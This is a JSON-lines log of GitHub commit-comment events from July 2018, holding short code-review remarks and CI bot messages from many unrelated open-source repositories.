{"id":"7955074754","type":"CommitCommentEvent","actor":{"login":"nlhiorth"},"repo":{"name":"usit-gd/mreg"},"payload":{"comment":{"id":29682576,"position":null,"line":null,"path":null,"commit_id":"c7d7b897286ab18179518c1668fe257470f3f8d3","created_at":"2018-07-12T09:34:07Z","updated_at":"2018-07-12T09:34:07Z","author_association":"COLLABORATOR","body":"Filtrering bruker standard django-filtrering, ref:\r\nhttps://github.com/miki725/django-url-filter"}},"created_at":"2018-07-12T09:34:07Z"}
{"id":"7955075752","type":"CommitCommentEvent","actor":{"login":"ml054"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29682577,"position":70,"line":246,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"468b1374c450b3150e8055a0beed17b62af8e71b","created_at":"2018-07-12T09:34:18Z","updated_at":"2018-07-12T09:34:18Z","author_association":"OWNER","body":" this.fullTextSearch(isStandardAnalyzer()  && this.indexing() === \"Search\")"}},"created_at":"2018-07-12T09:34:18Z"}
{"id":"7955076737","type":"CommitCommentEvent","actor":{"login":"acao"},"repo":{"name":"tea-cat/guanacaste-map"},"payload":{"comment":{"id":29682578,"position":null,"line":null,"path":null,"commit_id":"83fc9746886721b596d7d4c60955319712ab6d30","created_at":"2018-07-12T09:34:29Z","updated_at":"2018-07-12T09:34:29Z","author_association":"COLLABORATOR","body":"@tea-cat fyi, you can make it `scroll-y` for example to only scroll vertically"}},"created_at":"2018-07-12T09:34:29Z"}
{"id":"7955076859","type":"CommitCommentEvent","actor":{"login":"joakim-brannstrom"},"repo":{"name":"joakim-brannstrom/dextool"},"payload":{"comment":{"id":29682580,"position":23,"line":null,"path":"plugin/eqdetect/source/dextool/plugin/eqdetect/runner.d","commit_id":"a5c75ac924591f6346057780b565dfbfe3147bb6","created_at":"2018-07-12T09:34:30Z","updated_at":"2018-07-12T09:34:30Z","author_association":"OWNER","body":"Tip: it is possible to switch over a string literal.\n```d\nswitch (a) { case \"foo\":. ....\n```"}},"created_at":"2018-07-12T09:34:30Z"}
{"id":"7955077418","type":"CommitCommentEvent","actor":{"login":"Mozstar123"},"repo":{"name":"Mozstar123/mozzzy"},"payload":{"comment":{"id":29682582,"position":null,"line":null,"path":null,"commit_id":"10ee2aa2ba591139931fef9cbe73acea3b3ace10","created_at":"2018-07-12T09:34:36Z","updated_at":"2018-07-12T09:34:36Z","author_association":"OWNER","body":"![tickets](https://user-images.githubusercontent.com/40825771/42625234-281045f8-85bf-11e8-92f1-8c00792d4dc5.jpg)\r\n"}},"created_at":"2018-07-12T09:34:36Z"}
{"id":"7955078408","type":"CommitCommentEvent","actor":{"login":"galvani"},"repo":{"name":"mautic/mautic"},"payload":{"comment":{"id":29682584,"position":55,"line":55,"path":"app/bundles/LeadBundle/Segment/Query/Expression/CompositeExpression.php","commit_id":"53218d831b66efa257789157dc43ada31f345b53","created_at":"2018-07-12T09:34:46Z","updated_at":"2018-07-12T09:34:46Z","author_association":"CONTRIBUTOR","body":"It is available via ```getQueryPart```"}},"created_at":"2018-07-12T09:34:46Z"}
{"id":"7955079941","type":"CommitCommentEvent","actor":{"login":"ml054"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29682586,"position":96,"line":300,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"468b1374c450b3150e8055a0beed17b62af8e71b","created_at":"2018-07-12T09:35:04Z","updated_at":"2018-07-12T09:35:04Z","author_association":"OWNER","body":"rollback"}},"created_at":"2018-07-12T09:35:04Z"}
{"id":"7955082490","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29682588,"position":300,"line":207,"path":"contracts/RockPaperScissors.sol","commit_id":"1364f6640dd969b53cef5b8fa6b035a978d6d6ed","created_at":"2018-07-12T09:35:30Z","updated_at":"2018-07-12T09:35:30Z","author_association":"NONE","body":"Since this function has such a convoluted computation, I would make it `public` and test it thoroughly in unit tests."}},"created_at":"2018-07-12T09:35:30Z"}
{"id":"7955082554","type":"CommitCommentEvent","actor":{"login":"dbajgoric"},"repo":{"name":"peterkohautarm/Vulkan-ValidationLayers"},"payload":{"comment":{"id":29682589,"position":5,"line":14962,"path":"tests/layer_validation_tests.cpp","commit_id":"a0392c31cef4ed4f04c130095c245cb831b9657e","created_at":"2018-07-12T09:35:31Z","updated_at":"2018-07-12T09:35:31Z","author_association":"NONE","body":"'bound' vertex buffer"}},"created_at":"2018-07-12T09:35:31Z"}
{"id":"7955084683","type":"CommitCommentEvent","actor":{"login":"joakim-brannstrom"},"repo":{"name":"joakim-brannstrom/dextool"},"payload":{"comment":{"id":29682591,"position":21,"line":null,"path":"plugin/eqdetect/source/dextool/plugin/eqdetect/runner.d","commit_id":"a5c75ac924591f6346057780b565dfbfe3147bb6","created_at":"2018-07-12T09:35:53Z","updated_at":"2018-07-12T09:35:53Z","author_association":"OWNER","body":"Tip: if it is an absolutepath it is possible to directly cast to string `cast(string)`"}},"created_at":"2018-07-12T09:35:53Z"}
{"id":"7955085320","type":"CommitCommentEvent","actor":{"login":"dragon-cn"},"repo":{"name":"dragon-cn/helloworld"},"payload":{"comment":{"id":29682592,"position":2,"line":2,"path":"README.md","commit_id":"37cf982f97558e981104d16429b8a1cf9cc8410c","created_at":"2018-07-12T09:36:00Z","updated_at":"2018-07-12T09:36:00Z","author_association":"OWNER","body":"just add log "}},"created_at":"2018-07-12T09:36:00Z"}
{"id":"7955086151","type":"CommitCommentEvent","actor":{"login":"ml054"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29682594,"position":109,"line":356,"path":"src/Raven.Studio/typescript/models/database/index/indexFieldOptions.ts","commit_id":"468b1374c450b3150e8055a0beed17b62af8e71b","created_at":"2018-07-12T09:36:10Z","updated_at":"2018-07-12T09:36:10Z","author_association":"OWNER","body":"put (  and  )"}},"created_at":"2018-07-12T09:36:10Z"}
{"id":"7955089129","type":"CommitCommentEvent","actor":{"login":"GesukaLeo"},"repo":{"name":"GesukaLeo/Temperature-Converter"},"payload":{"comment":{"id":29682601,"position":null,"line":null,"path":null,"commit_id":"b1f49665ad307b682337a8fa0a1b7a69815f1fcb","created_at":"2018-07-12T09:36:42Z","updated_at":"2018-07-12T09:36:42Z","author_association":"OWNER","body":"The file is up to date, Let me Pull Request to the master barnch"}},"created_at":"2018-07-12T09:36:42Z"}
{"id":"7955089279","type":"CommitCommentEvent","actor":{"login":"joakim-brannstrom"},"repo":{"name":"joakim-brannstrom/dextool"},"payload":{"comment":{"id":29682602,"position":24,"line":null,"path":"plugin/eqdetect/source/dextool/plugin/eqdetect/runner.d","commit_id":"a5c75ac924591f6346057780b565dfbfe3147bb6","created_at":"2018-07-12T09:36:43Z","updated_at":"2018-07-12T09:36:43Z","author_association":"OWNER","body":"Please create an enum for the magic numbers"}},"created_at":"2018-07-12T09:36:43Z"}
{"id":"7955093194","type":"CommitCommentEvent","actor":{"login":"ml054"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29682611,"position":33,"line":430,"path":"src/Raven.Studio/typescript/viewmodels/database/indexes/editIndex.ts","commit_id":"468b1374c450b3150e8055a0beed17b62af8e71b","created_at":"2018-07-12T09:37:25Z","updated_at":"2018-07-12T09:37:25Z","author_association":"OWNER","body":"remove that"}},"created_at":"2018-07-12T09:37:25Z"}
{"id":"7955094867","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29682614,"position":null,"line":null,"path":null,"commit_id":"86b95408fdd8b8131ad2d8064a71a01920c1db2c","created_at":"2018-07-12T09:37:43Z","updated_at":"2018-07-12T09:37:43Z","author_association":"NONE","body":"fix_restrictive_cli (mbadams5) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-86b95408fdd8b8131ad2d8064a71a01920c1db2c-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-12T09:37:43Z"}
{"id":"7955100184","type":"CommitCommentEvent","actor":{"login":"ipochi"},"repo":{"name":"ram-infrac/sdk-test"},"payload":{"comment":{"id":29682623,"position":14,"line":14,"path":"pkg/sanity/cloudbackup.go","commit_id":"0b59527f2f0b42c4070daaba0ffb7a5a7e4637f1","created_at":"2018-07-12T09:38:42Z","updated_at":"2018-07-12T09:38:42Z","author_association":"NONE","body":"Please provide separate Describe blocks for each verb."}},"created_at":"2018-07-12T09:38:42Z"}
{"id":"7955101160","type":"CommitCommentEvent","actor":{"login":"william-gooch"},"repo":{"name":"Scholar-6/learning-fortress-frontend"},"payload":{"comment":{"id":29682626,"position":null,"line":null,"path":null,"commit_id":"7d39325604f63c470136a5140a5ff44b6313a0b6","created_at":"2018-07-12T09:38:53Z","updated_at":"2018-07-12T09:38:53Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Separate production frontend from dev backend](https://trello.com/c/VTey92Lf/30-separate-production-frontend-from-dev-backend)"}},"created_at":"2018-07-12T09:38:53Z"}
{"id":"7955104065","type":"CommitCommentEvent","actor":{"login":"tintou"},"repo":{"name":"elementary/calendar"},"payload":{"comment":{"id":29682630,"position":null,"line":null,"path":null,"commit_id":"d5dd07b7cf5034928922807ebada36aac6ec3f81","created_at":"2018-07-12T09:39:26Z","updated_at":"2018-07-12T09:39:26Z","author_association":"MEMBER","body":"@decathorpe thanks for watching the changes, I just fixed both files"}},"created_at":"2018-07-12T09:39:26Z"}
{"id":"7955105046","type":"CommitCommentEvent","actor":{"login":"joakim-brannstrom"},"repo":{"name":"joakim-brannstrom/dextool"},"payload":{"comment":{"id":29682636,"position":14,"line":null,"path":"plugin/eqdetect/source/dextool/plugin/eqdetect/subfolder/parser.d","commit_id":"a5c75ac924591f6346057780b565dfbfe3147bb6","created_at":"2018-07-12T09:39:36Z","updated_at":"2018-07-12T09:39:36Z","author_association":"OWNER","body":"Is it intentional that the strings are mutable? \nDid you mean `string[]`?"}},"created_at":"2018-07-12T09:39:36Z"}
{"id":"7955106969","type":"CommitCommentEvent","actor":{"login":"ml054"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29682640,"position":54,"line":677,"path":"src/Raven.Studio/typescript/viewmodels/database/indexes/editIndex.ts","commit_id":"468b1374c450b3150e8055a0beed17b62af8e71b","created_at":"2018-07-12T09:39:57Z","updated_at":"2018-07-12T09:39:57Z","author_association":"OWNER","body":"fix indentation + spaces"}},"created_at":"2018-07-12T09:39:57Z"}
{"id":"7955107361","type":"CommitCommentEvent","actor":{"login":"ml054"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29682642,"position":59,"line":682,"path":"src/Raven.Studio/typescript/viewmodels/database/indexes/editIndex.ts","commit_id":"468b1374c450b3150e8055a0beed17b62af8e71b","created_at":"2018-07-12T09:40:02Z","updated_at":"2018-07-12T09:40:02Z","author_association":"OWNER","body":"typo"}},"created_at":"2018-07-12T09:40:02Z"}
{"id":"7955109047","type":"CommitCommentEvent","actor":{"login":"dbajgoric"},"repo":{"name":"peterkohautarm/Vulkan-ValidationLayers"},"payload":{"comment":{"id":29682646,"position":27,"line":14984,"path":"tests/layer_validation_tests.cpp","commit_id":"a0392c31cef4ed4f04c130095c245cb831b9657e","created_at":"2018-07-12T09:40:20Z","updated_at":"2018-07-12T09:40:20Z","author_association":"NONE","body":"It'd be nice to add another test case where offset passed to vkCmdBindVertexBuffers is aligned correctly, but binding stride is set in such a way that final attribute alignment will be unaligned. This could be part of this test fixture."}},"created_at":"2018-07-12T09:40:20Z"}
{"id":"7955112088","type":"CommitCommentEvent","actor":{"login":"joakim-brannstrom"},"repo":{"name":"joakim-brannstrom/dextool"},"payload":{"comment":{"id":29682648,"position":37,"line":null,"path":"plugin/eqdetect/source/dextool/plugin/eqdetect/subfolder/parser.d","commit_id":"a5c75ac924591f6346057780b565dfbfe3147bb6","created_at":"2018-07-12T09:40:53Z","updated_at":"2018-07-12T09:40:53Z","author_association":"OWNER","body":"Strong tip. Never catch throwable. That is fatal fault such as memory violation.\nCatch Exception and only that at the most"}},"created_at":"2018-07-12T09:40:53Z"}
{"id":"7955112701","type":"CommitCommentEvent","actor":{"login":"jpountz"},"repo":{"name":"nknize/lucene-solr"},"payload":{"comment":{"id":29682649,"position":59,"line":59,"path":"lucene/sandbox/src/java/org/apache/lucene/search/LatLonPolygonBoundingBoxQuery.java","commit_id":"db47b7490243043b2581a071fe3efe63c7d393c3","created_at":"2018-07-12T09:40:59Z","updated_at":"2018-07-12T09:40:59Z","author_association":"NONE","body":"There are multiple references to Long.BYTES in this class, which I find confusing since we encode integers, not longs. Let's replace eg. the above one with `4 * Integer.BYTES`?"}},"created_at":"2018-07-12T09:40:59Z"}
{"id":"7955114293","type":"CommitCommentEvent","actor":{"login":"ml054"},"repo":{"name":"ml054/ravendb"},"payload":{"comment":{"id":29682650,"position":260,"line":547,"path":"src/Raven.Studio/wwwroot/App/views/database/indexes/editIndex.html","commit_id":"468b1374c450b3150e8055a0beed17b62af8e71b","created_at":"2018-07-12T09:41:16Z","updated_at":"2018-07-12T09:41:16Z","author_association":"OWNER","body":"'#analyzerName'"}},"created_at":"2018-07-12T09:41:16Z"}
{"id":"7955121766","type":"CommitCommentEvent","actor":{"login":"joakim-brannstrom"},"repo":{"name":"joakim-brannstrom/dextool"},"payload":{"comment":{"id":29682666,"position":40,"line":null,"path":"plugin/eqdetect/source/dextool/plugin/eqdetect/subfolder/parser.d","commit_id":"a5c75ac924591f6346057780b565dfbfe3147bb6","created_at":"2018-07-12T09:42:38Z","updated_at":"2018-07-12T09:42:38Z","author_association":"OWNER","body":"A unittest would be awesome here. See mutation for the gtest parser."}},"created_at":"2018-07-12T09:42:38Z"}
{"id":"7955132293","type":"CommitCommentEvent","actor":{"login":"Shahar-Y"},"repo":{"name":"meateam/seal"},"payload":{"comment":{"id":29682687,"position":null,"line":null,"path":null,"commit_id":"d7fc838e058a3772989976bbb361f6e8df1fac49","created_at":"2018-07-12T09:44:37Z","updated_at":"2018-07-12T09:44:37Z","author_association":"COLLABORATOR","body":"#25 "}},"created_at":"2018-07-12T09:44:37Z"}
{"id":"7955132723","type":"CommitCommentEvent","actor":{"login":"joakim-brannstrom"},"repo":{"name":"joakim-brannstrom/dextool"},"payload":{"comment":{"id":29682689,"position":7,"line":null,"path":"plugin/eqdetect/source/dextool/plugin/eqdetect/subfolder/parser.d","commit_id":"8043ed85f7f8db29b133eac97b00491bd3c60c3b","created_at":"2018-07-12T09:44:42Z","updated_at":"2018-07-12T09:44:42Z","author_association":"OWNER","body":"Tip:\n`foreach (data; ss.splitter(\"data: \").dropOne)`"}},"created_at":"2018-07-12T09:44:42Z"}
{"id":"7955134190","type":"CommitCommentEvent","actor":{"login":"Shahar-Y"},"repo":{"name":"meateam/seal"},"payload":{"comment":{"id":29682693,"position":null,"line":null,"path":null,"commit_id":"56bea09120a7f1f311186f66721e571404f2ff43","created_at":"2018-07-12T09:44:58Z","updated_at":"2018-07-12T09:44:58Z","author_association":"COLLABORATOR","body":"#25"}},"created_at":"2018-07-12T09:44:58Z"}
{"id":"7955138943","type":"CommitCommentEvent","actor":{"login":"santoshgistto"},"repo":{"name":"Microsoft/react-native-code-push"},"payload":{"comment":{"id":29682703,"position":null,"line":null,"path":null,"commit_id":"0daa647c5c614d81dcfff53898e0ad8feea4b20d","created_at":"2018-07-12T09:45:50Z","updated_at":"2018-07-12T09:45:50Z","author_association":"NONE","body":"Needs to update doc also here\r\nhttps://docs.microsoft.com/en-us/appcenter/distribution/codepush/react-native\r\n"}},"created_at":"2018-07-12T09:45:50Z"}
{"id":"7955139640","type":"CommitCommentEvent","actor":{"login":"joakim-brannstrom"},"repo":{"name":"joakim-brannstrom/dextool"},"payload":{"comment":{"id":29682705,"position":13,"line":null,"path":"plugin/mutate/source/dextool/plugin/mutate/backend/database/schema.d","commit_id":"5550234461a9f12cbe11b32a65b776bafb9dab13","created_at":"2018-07-12T09:45:58Z","updated_at":"2018-07-12T09:45:58Z","author_association":"OWNER","body":"Nice"}},"created_at":"2018-07-12T09:45:58Z"}
{"id":"7955142692","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29682711,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-12T09:46:31Z","updated_at":"2018-07-12T09:46:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T09:46:31Z"}
{"id":"7955143408","type":"CommitCommentEvent","actor":{"login":"FrancescoConti"},"repo":{"name":"pulp-platform/style-guidelines"},"payload":{"comment":{"id":29682712,"position":54,"line":93,"path":"README.md","commit_id":"19f16281a889ebeffdfd4aea381a6026408c3d2a","created_at":"2018-07-12T09:46:39Z","updated_at":"2018-07-12T09:46:39Z","author_association":"MEMBER","body":"I still prefer this variant to the rule as it seems to me that `if` and `else` blocks are more visually identifiable in this way, in particular the \"nature\" of a block is always identified by the word starting it, e.g. by `else`. `end` is a generic word like `begin`."}},"created_at":"2018-07-12T09:46:39Z"}
{"id":"7955143843","type":"CommitCommentEvent","actor":{"login":"bhaskarnaramesh001"},"repo":{"name":"bhaskarnaramesh001/container"},"payload":{"comment":{"id":29682713,"position":1,"line":1,"path":"README.md","commit_id":"072b08d552c9c3694c42fa66a37586749c6b28d8","created_at":"2018-07-12T09:46:44Z","updated_at":"2018-07-12T09:46:44Z","author_association":"OWNER","body":"hi ramesh welcome"}},"created_at":"2018-07-12T09:46:44Z"}
{"id":"7955143907","type":"CommitCommentEvent","actor":{"login":"filomon"},"repo":{"name":"naverus/arpa"},"payload":{"comment":{"id":29682714,"position":60,"line":60,"path":"app/arpa_components/arpa-model-editor/arpa-model-editor.html","commit_id":"989decde5d444cb7266a19a2ce5d08f946114397","created_at":"2018-07-12T09:46:45Z","updated_at":"2018-07-12T09:46:45Z","author_association":"COLLABORATOR","body":"Mejorar la descripción del comentario\r\n"}},"created_at":"2018-07-12T09:46:45Z"}
{"id":"7955145935","type":"CommitCommentEvent","actor":{"login":"jpountz"},"repo":{"name":"nknize/lucene-solr"},"payload":{"comment":{"id":29682716,"position":81,"line":81,"path":"lucene/sandbox/src/java/org/apache/lucene/document/LatLonPolygon.java","commit_id":"db47b7490243043b2581a071fe3efe63c7d393c3","created_at":"2018-07-12T09:47:07Z","updated_at":"2018-07-12T09:47:07Z","author_association":"NONE","body":"Let's either document that this only accepts bounding boxes that don't cross the dateline, or split it into two boxes like LatLonPoint.newBoxQuery?"}},"created_at":"2018-07-12T09:47:07Z"}
{"id":"7955146343","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29682717,"position":null,"line":null,"path":null,"commit_id":"584f36882d0c14bf45f90dd115ba0559428ab34e","created_at":"2018-07-12T09:47:11Z","updated_at":"2018-07-12T09:47:11Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T09:47:11Z"}
{"id":"7955146871","type":"CommitCommentEvent","actor":{"login":"joakim-brannstrom"},"repo":{"name":"joakim-brannstrom/dextool"},"payload":{"comment":{"id":29682718,"position":24,"line":null,"path":"plugin/eqdetect/source/dextool/plugin/eqdetect/runner.d","commit_id":"a5c75ac924591f6346057780b565dfbfe3147bb6","created_at":"2018-07-12T09:47:16Z","updated_at":"2018-07-12T09:47:16Z","author_association":"OWNER","body":"Maybe a good place for the enum is the Mutation type that have the others?"}},"created_at":"2018-07-12T09:47:16Z"}
{"id":"7955147137","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29682719,"position":6,"line":46,"path":"round.rb","commit_id":"e105a8af903237b6c745d2e83215e60f070e6abb","created_at":"2018-07-12T09:47:20Z","updated_at":"2018-07-12T09:47:20Z","author_association":"NONE","body":"оригинально )))\r\nа зачем же сразу из программы то выходить )))"}},"created_at":"2018-07-12T09:47:20Z"}
{"id":"7955148540","type":"CommitCommentEvent","actor":{"login":"FrancescoConti"},"repo":{"name":"pulp-platform/style-guidelines"},"payload":{"comment":{"id":29682721,"position":72,"line":136,"path":"README.md","commit_id":"19f16281a889ebeffdfd4aea381a6026408c3d2a","created_at":"2018-07-12T09:47:34Z","updated_at":"2018-07-12T09:47:34Z","author_association":"MEMBER","body":"This is **so very true** -- I would make it more prominent. It is a more important rule than many others listed here and should appear in the TL;TR."}},"created_at":"2018-07-12T09:47:34Z"}
{"id":"7955148561","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29682722,"position":null,"line":null,"path":null,"commit_id":"91de98cd62e6756a2b574fec0f19d28d56cd71d5","created_at":"2018-07-12T09:47:35Z","updated_at":"2018-07-12T09:47:35Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T09:47:35Z"}
{"id":"7955151869","type":"CommitCommentEvent","actor":{"login":"jannie-louwrens"},"repo":{"name":"UnisaProject/UnisaMyAdmin"},"payload":{"comment":{"id":29682728,"position":47,"line":47,"path":"myadmin-service-impls/student-services/src/main/java/za/ac/unisa/myadmin/student/services/decorators/StudentServiceComplianceDecorator.java","commit_id":"3d3757ac3c94610be6e9e223342a2fce221d92d2","created_at":"2018-07-12T09:48:13Z","updated_at":"2018-07-12T09:48:13Z","author_association":"COLLABORATOR","body":"I think it is great that you explore the compliance decorator route.\r\nNot to be pedantic about it but this should really through a MissingParameterException.\r\nThe OperationFailedException is reserved for when something seriously goes wrong while serving the request."}},"created_at":"2018-07-12T09:48:13Z"}
{"id":"7955152153","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29682729,"position":null,"line":null,"path":null,"commit_id":"15183b39c052da06bfd6ecae742e832f520324a5","created_at":"2018-07-12T09:48:17Z","updated_at":"2018-07-12T09:48:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T09:48:17Z"}
{"id":"7955152945","type":"CommitCommentEvent","actor":{"login":"jannie-louwrens"},"repo":{"name":"UnisaProject/UnisaMyAdmin"},"payload":{"comment":{"id":29682733,"position":55,"line":55,"path":"myadmin-service-impls/student-services/src/main/java/za/ac/unisa/myadmin/student/services/decorators/StudentServiceComplianceDecorator.java","commit_id":"3d3757ac3c94610be6e9e223342a2fce221d92d2","created_at":"2018-07-12T09:48:26Z","updated_at":"2018-07-12T09:48:26Z","author_association":"COLLABORATOR","body":"ditto"}},"created_at":"2018-07-12T09:48:26Z"}
{"id":"7955154301","type":"CommitCommentEvent","actor":{"login":"FrancescoConti"},"repo":{"name":"pulp-platform/style-guidelines"},"payload":{"comment":{"id":29682739,"position":24,"line":24,"path":"README.md","commit_id":"19f16281a889ebeffdfd4aea381a6026408c3d2a","created_at":"2018-07-12T09:48:40Z","updated_at":"2018-07-12T09:48:40Z","author_association":"MEMBER","body":"You probably meant `camelCase` here."}},"created_at":"2018-07-12T09:48:40Z"}
{"id":"7955157291","type":"CommitCommentEvent","actor":{"login":"Awzaw"},"repo":{"name":"r7vmc/ApiUpdaterDP"},"payload":{"comment":{"id":29682745,"position":null,"line":null,"path":null,"commit_id":"9f879560e3bdb6bd30e5a2a728930204a7fdcf0d","created_at":"2018-07-12T09:49:15Z","updated_at":"2018-07-12T09:49:15Z","author_association":"NONE","body":"Please note that there is no guarantee that this plugin would be accepted even if you did manage to implement automatic code updates (the Changelog for 3.0.0 is at  https://github.com/pmmp/PocketMine-MP/releases/tag/3.0.0 btw), because you are hacking other plugins to force them to run in an environment they were neither built for or tested on."}},"created_at":"2018-07-12T09:49:15Z"}
{"id":"7955164505","type":"CommitCommentEvent","actor":{"login":"ss7424Refar"},"repo":{"name":"ss7424Refar/ATS"},"payload":{"comment":{"id":29682756,"position":null,"line":null,"path":null,"commit_id":"7469755656a17fb0d631b57dad0a5296367cf9f1","created_at":"2018-07-12T09:50:32Z","updated_at":"2018-07-12T09:50:32Z","author_association":"OWNER","body":"push failed . repush. "}},"created_at":"2018-07-12T09:50:32Z"}
{"id":"7955165436","type":"CommitCommentEvent","actor":{"login":"MBaltz"},"repo":{"name":"Sekva/webPro"},"payload":{"comment":{"id":29682759,"position":null,"line":null,"path":null,"commit_id":"0c3ec5741638a39324435fd085a5fc41f98fe501","created_at":"2018-07-12T09:50:42Z","updated_at":"2018-07-12T09:50:42Z","author_association":"COLLABORATOR","body":"Observações:\r\n- Arrumar mostrarPerfil (controller)\r\n- Ainda falta fazer comq ue quando deletar um usuário, tratar também todas as susas dependencias\r\n- Arrumar o Botão editar em /home. Não está passando o id do user\r\n- Tive que pular a checagem de exclusão de perfil, por conta do tempo.\r\n\r\n- Falta organizar\r\n- Falta deixar bonito"}},"created_at":"2018-07-12T09:50:42Z"}
{"id":"7955165741","type":"CommitCommentEvent","actor":{"login":"Grafu"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29682760,"position":null,"line":null,"path":null,"commit_id":"93625a226154438d5d3cca612dbe088264481e61","created_at":"2018-07-12T09:50:45Z","updated_at":"2018-07-12T09:50:45Z","author_association":"NONE","body":"Revert this. There are custom cars which have spoiler slots and those spoilers look very good on them. This commit blocks those custom cars from having spoilers. Also, same applies on most of the default cars. "}},"created_at":"2018-07-12T09:50:45Z"}
{"id":"7955165778","type":"CommitCommentEvent","actor":{"login":"ss7424Refar"},"repo":{"name":"ss7424Refar/ATS"},"payload":{"comment":{"id":29682761,"position":null,"line":null,"path":null,"commit_id":"1ee9c0769941de219b15f586a343c4c6e813528c","created_at":"2018-07-12T09:50:46Z","updated_at":"2018-07-12T09:50:46Z","author_association":"OWNER","body":"push failed . repush. "}},"created_at":"2018-07-12T09:50:46Z"}
{"id":"7955169885","type":"CommitCommentEvent","actor":{"login":"mlocati"},"repo":{"name":"concrete5/concrete5"},"payload":{"comment":{"id":29682767,"position":null,"line":null,"path":null,"commit_id":"23ce0690588992de6406791701251c7a380fa3c4","created_at":"2018-07-12T09:51:30Z","updated_at":"2018-07-12T09:51:30Z","author_association":"COLLABORATOR","body":"See https://github.com/concrete5/concrete5/pull/6887"}},"created_at":"2018-07-12T09:51:30Z"}
